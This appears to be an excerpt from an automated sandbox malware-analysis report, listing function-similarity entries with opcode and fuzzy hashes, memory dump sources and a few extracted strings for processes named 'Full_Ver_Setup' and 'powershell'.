                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3efdd470778db0570fd0940dc727e321a9f08f648cb0bebc6529bde5ac1cdd91
                                                                                                                                                                  • Instruction ID: 2e5fe042fd1c798bef7ce68973e0c32f9d274284d4ba804fd0bfc27a64dc0bb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3efdd470778db0570fd0940dc727e321a9f08f648cb0bebc6529bde5ac1cdd91
                                                                                                                                                                  • Instruction Fuzzy Hash: 10110472828172BBDF24DF248C20776BBA5EF67240B0D44BED8C697251D22A98C5D692
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 03548ad1a0289b64fa111b8a088a157184dc12421b569fdc7d51542ef1fb2b78
                                                                                                                                                                  • Instruction ID: c33d48dd84b751776800887aff6c2098bdcfa53997ab1e6682b4df232c1a7a0b
                                                                                                                                                                  • Opcode Fuzzy Hash: 03548ad1a0289b64fa111b8a088a157184dc12421b569fdc7d51542ef1fb2b78
                                                                                                                                                                  • Instruction Fuzzy Hash: F1012D35724331EBD314DB548C8093A77E2FBE9B14F08457DD4865B650C2B09C40CB69
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 633041c384c3c93bd91ecba9c63cc379b2e0c5ca734537abaa547604c1bba8ab
                                                                                                                                                                  • Instruction ID: ca3967b082fb3e7ec5169955befd72b528df5613deb09a59cc2c2efc9b4ea979
                                                                                                                                                                  • Opcode Fuzzy Hash: 633041c384c3c93bd91ecba9c63cc379b2e0c5ca734537abaa547604c1bba8ab
                                                                                                                                                                  • Instruction Fuzzy Hash: DD01F97462830197DB18CB24AA8093FB399FBE7624F7411ACD44327255D321DC958BDA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ba85686cd7d01f69d27cca88313ae49ecdca91c56a8651490bb07c8e96226a13
                                                                                                                                                                  • Instruction ID: ca0399a95d18608a8e4137ba4bb22b033497b74a7186edb7791dc2be3a7c179d
                                                                                                                                                                  • Opcode Fuzzy Hash: ba85686cd7d01f69d27cca88313ae49ecdca91c56a8651490bb07c8e96226a13
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01D135684B019BD325CF25CC81B63B7E7FF85201F58892CA58297A96D679F40A8B04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dd4b7887590947e640507599629081ddc326399db3d38bd18dfb5d94dc5442e2
                                                                                                                                                                  • Instruction ID: ea564e2a5d7a874b0407d6aac1ed56a46f02bc8f9339fd9171aed7a80d503e06
                                                                                                                                                                  • Opcode Fuzzy Hash: dd4b7887590947e640507599629081ddc326399db3d38bd18dfb5d94dc5442e2
                                                                                                                                                                  • Instruction Fuzzy Hash: DA0156785283809FD714DF68C6905ABFFF4EBC2320F14891DA5E1AB350D2B88845CB97
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                  • Instruction ID: b7b4b47f0017e641027fc4b4062f2bd712b7ec124fbef7d9fec481af2585a248
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 09014634A20108EFCB14DF98C584AACF7B5FF44310F248298D814AB395C730BE85EB50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d0ee54c1d8263b1ae69d31285d2cefaa97b58c1fe28462628144f6aa639b0136
                                                                                                                                                                  • Instruction ID: 242bd1d6d53c3fd0d5e0dbf7acda518e197404d830980af2c8e03cd19d5342c2
                                                                                                                                                                  • Opcode Fuzzy Hash: d0ee54c1d8263b1ae69d31285d2cefaa97b58c1fe28462628144f6aa639b0136
                                                                                                                                                                  • Instruction Fuzzy Hash: 95D02B7A83C5B3A24E298D140820670EF130A4720570D41E4A8C27F491C98BCC834154
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b93ac188aeb3168578ebce70d6586b9f5dfaa3bf95e9061c095b8a842906f94a
                                                                                                                                                                  • Instruction ID: fd84c7d7dd2e4198c773b33268a66c3904c763cf41315747db98ef5c362738c7
                                                                                                                                                                  • Opcode Fuzzy Hash: b93ac188aeb3168578ebce70d6586b9f5dfaa3bf95e9061c095b8a842906f94a
                                                                                                                                                                  • Instruction Fuzzy Hash: EDE08C3440C7D29DC712CF2A8410231FFF0AF97684F18A4DDD0C1AB263D22581869B26
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 966256788f2ea28a9abe1eb818366d4fe186078ac5ddb570089881c989f6eb41
                                                                                                                                                                  • Instruction ID: 153bf8dcd83d8efca8819f49322324011317ffdb3a0414d6f49220ef735856c8
                                                                                                                                                                  • Opcode Fuzzy Hash: 966256788f2ea28a9abe1eb818366d4fe186078ac5ddb570089881c989f6eb41
                                                                                                                                                                  • Instruction Fuzzy Hash: 22D0C97EE916008F97888F60ED5A1647732EBCB322748A934A945D3318CA38E455890C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 041d03524d3cbbbbf16d28b2ec3206ef53181ff12c0fe89598450f3a1396ca45
                                                                                                                                                                  • Instruction ID: 5c5a1151badcf41af832dc1acccacd61720ac34c2129f81edc140d769838385d
                                                                                                                                                                  • Opcode Fuzzy Hash: 041d03524d3cbbbbf16d28b2ec3206ef53181ff12c0fe89598450f3a1396ca45
                                                                                                                                                                  • Instruction Fuzzy Hash: 6DA00228E9C400868708CF20AD51671E3BD9BAF210F5134288005B7851E510D404850C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179773295.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3750000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 52236edd72114c2760d5bdc7d9341a0b82ed794a6b5d856a4f1f21cf42380bbe
                                                                                                                                                                  • Instruction ID: d3e7dd78b30576dec176c7b02f0b6cea3a3e4e4bb112fe6b25792ab58ccc7d90
                                                                                                                                                                  • Opcode Fuzzy Hash: 52236edd72114c2760d5bdc7d9341a0b82ed794a6b5d856a4f1f21cf42380bbe
                                                                                                                                                                  • Instruction Fuzzy Hash: FDF17D74A002499FCB19CF9DC4849AEFBB1FF48310B248699E955AB365C735FC91CBA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d546523d15d84369ec657f057e52f164d71dfddcec5819b3900e8a32fe77c37d
                                                                                                                                                                  • Instruction ID: b1d9b59572de63be4282419214acd0da769630e2e5ca85b3ddcd3b5d89bb8047
                                                                                                                                                                  • Opcode Fuzzy Hash: d546523d15d84369ec657f057e52f164d71dfddcec5819b3900e8a32fe77c37d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E516BB0B00219CFCB558B7D8841A6BBBA2AF85344F1C80AAD601DB351DB36DE85C7E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cdd26490a7544645a744acbfb9809b06881f61280d39b6f94d968212d05e2948
                                                                                                                                                                  • Instruction ID: 45ce62d5d7d1b8814328e551bb907d825a2dbaca756aa9bc2f43307a2fd36db7
                                                                                                                                                                  • Opcode Fuzzy Hash: cdd26490a7544645a744acbfb9809b06881f61280d39b6f94d968212d05e2948
                                                                                                                                                                  • Instruction Fuzzy Hash: BD4129F0B0020ACFCB688F598581BA67BB2EF84394F1C41A5DA059F351D736DA85C7E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179773295.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3750000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 09481b3d32c150d2f05735e3e0980effe22dd8c7937d82d57e7361a5dcec9179
                                                                                                                                                                  • Instruction ID: 8d3fd9fb365a9d295468d90d4a4799f84080edbbadc9a771120396fc2c5b2b05
                                                                                                                                                                  • Opcode Fuzzy Hash: 09481b3d32c150d2f05735e3e0980effe22dd8c7937d82d57e7361a5dcec9179
                                                                                                                                                                  • Instruction Fuzzy Hash: 2B412AB4A001159FCB09CF9AC5989BAFBB1FF48310B15819AD915AB365C736FC90CFA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179773295.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3750000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 30e5b988f148fe957c6ad8b7a28fe9024c61589bfec28a73e2f915d797aec62a
                                                                                                                                                                  • Instruction ID: 54167111c41e48b4b3a2ab1406e3c30b4f43d78d41fcb138dbe31d55ca51d968
                                                                                                                                                                  • Opcode Fuzzy Hash: 30e5b988f148fe957c6ad8b7a28fe9024c61589bfec28a73e2f915d797aec62a
                                                                                                                                                                  • Instruction Fuzzy Hash: E0215EB5A042198FCB04CF5CC4809AAFBB5FF49300B14859AE849EB366C735EC41CBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179773295.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3750000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ee5f0fa0d5355c6d41955e9be3896185ed76f91da07f2c014f9213c7f0c72390
                                                                                                                                                                  • Instruction ID: f89ce2fb5308c7687f28383668dc141aedcd67b2a225474a36a2d15acf3003a2
                                                                                                                                                                  • Opcode Fuzzy Hash: ee5f0fa0d5355c6d41955e9be3896185ed76f91da07f2c014f9213c7f0c72390
                                                                                                                                                                  • Instruction Fuzzy Hash: 18212C79A042498FCB04CF9CD494AAEFBB5FF49310B158599E849EB362C731EC45CBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179370107.000000000364D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0364D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_364d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5b1d01c86d15e7ba9b6225c9e290020d25f37aad9102f59e4771a801b6cbdabd
                                                                                                                                                                  • Instruction ID: 935d92db7abc82f6521e984060e230bb8cbe1b1a9c27e31ec711379aec0c35c4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b1d01c86d15e7ba9b6225c9e290020d25f37aad9102f59e4771a801b6cbdabd
                                                                                                                                                                  • Instruction Fuzzy Hash: 6301F731C093009AE710CE29CA84B67FF98DF41B24F0CC56AEC084B247C2799882C6B1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179370107.000000000364D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0364D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_364d000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8f153457beb46303acb38565f4a1017f11c62b18f3b169cdf41294e8e9fd1654
                                                                                                                                                                  • Instruction ID: b9a2287dc7fe30a5b75a8be4c7e7ecd742d3e7b2750392b6778e182f68b11da9
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f153457beb46303acb38565f4a1017f11c62b18f3b169cdf41294e8e9fd1654
                                                                                                                                                                  • Instruction Fuzzy Hash: 2901407140E3C09ED7128B25C994B52BFB8EF47624F1D84DBD8888F2A3C2699848C772
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2179773295.0000000003750000.00000040.00000800.00020000.00000000.sdmp, Offset: 03750000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3750000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8e254fba5ec2b8e12982ed5c72ddaa6cecd9f693a9afca212ed9e7a62c7dd1b4
                                                                                                                                                                  • Instruction ID: d198b4e70227401a5a64bb0f5f6a49a123568e90b3599940d106f86dc9494782
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e254fba5ec2b8e12982ed5c72ddaa6cecd9f693a9afca212ed9e7a62c7dd1b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 80F01C35E00105EFCB18CF99C8805ADF7B6FB88320B248559D959A7750C736AC96CB90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-1608119003
                                                                                                                                                                  • Opcode ID: 70f0388058997682ff68a6054e8a685dfe78926c42fdf5aa88738dab8b4ad227
                                                                                                                                                                  • Instruction ID: 6a4308866ac1d8ffb1ca9f1fe03e575930c17055c1e1c536d10cc313107d1d6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 70f0388058997682ff68a6054e8a685dfe78926c42fdf5aa88738dab8b4ad227
                                                                                                                                                                  • Instruction Fuzzy Hash: D5A18AB27043568FC7694B69984166ABFF1AFC2A10F1884BBD641CF353DA36C9C5C3A1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q
                                                                                                                                                                  • API String ID: 0-4192453120
                                                                                                                                                                  • Opcode ID: 3e851ba5773ea95ba2d22d71fccce006fc02a90103621d2fcaca4c7e21f5d8f0
                                                                                                                                                                  • Instruction ID: 957923f76dcd598dd2595858bb26a3486292dc1cc1ed6315e0687a2a1e8a5703
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e851ba5773ea95ba2d22d71fccce006fc02a90103621d2fcaca4c7e21f5d8f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 75B18CB1B043069FDBA48A698845767BBE2AFC2B10F14C46BD6059B353EF31C9C1C791
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q
                                                                                                                                                                  • API String ID: 0-2369969929
                                                                                                                                                                  • Opcode ID: 3bbc267d4d0a82ca6853b7014daa59259057f4ac3b1ea3d59abdc62d10a66fd5
                                                                                                                                                                  • Instruction ID: 935418c0026871b2e4f7e217efe1c81e550de6bcfbcd3f43bd886bede3a1ec2c
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bbc267d4d0a82ca6853b7014daa59259057f4ac3b1ea3d59abdc62d10a66fd5
                                                                                                                                                                  • Instruction Fuzzy Hash: E2816BB1B043459FC7658B698851766BFB2AF82B14F1484BBD605CF293DE31C9C4C3A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-578306960
                                                                                                                                                                  • Opcode ID: ccebabe54b497da9d86bf6216f1aa21b97a5c9721bc2b5aa88aba87d3101b512
                                                                                                                                                                  • Instruction ID: 0acbdde96a8c7180fd537fcd329885bf56fa87b825d31325ab3a371ad6778eaf
                                                                                                                                                                  • Opcode Fuzzy Hash: ccebabe54b497da9d86bf6216f1aa21b97a5c9721bc2b5aa88aba87d3101b512
                                                                                                                                                                  • Instruction Fuzzy Hash: 423118767053198FD7588A699444726BBE5AF85A20B28846EE684CF362CA32DD84C790
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2185655693.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7cf0000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                  • Opcode ID: 9a20c53ccc8a91cdf9c20f623bbc0737b9492f9499a75a9bc4c89adcbaec4916
                                                                                                                                                                  • Instruction ID: 0e03a0610176aa07816f9bb674cf7cd4b715a726bfd2c80f8344f01ee8114c9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a20c53ccc8a91cdf9c20f623bbc0737b9492f9499a75a9bc4c89adcbaec4916
                                                                                                                                                                  • Instruction Fuzzy Hash: 062147B175024A5BFBB85D6E9C80B2BABDABBC4715F24883AA605CB381CD35C941C361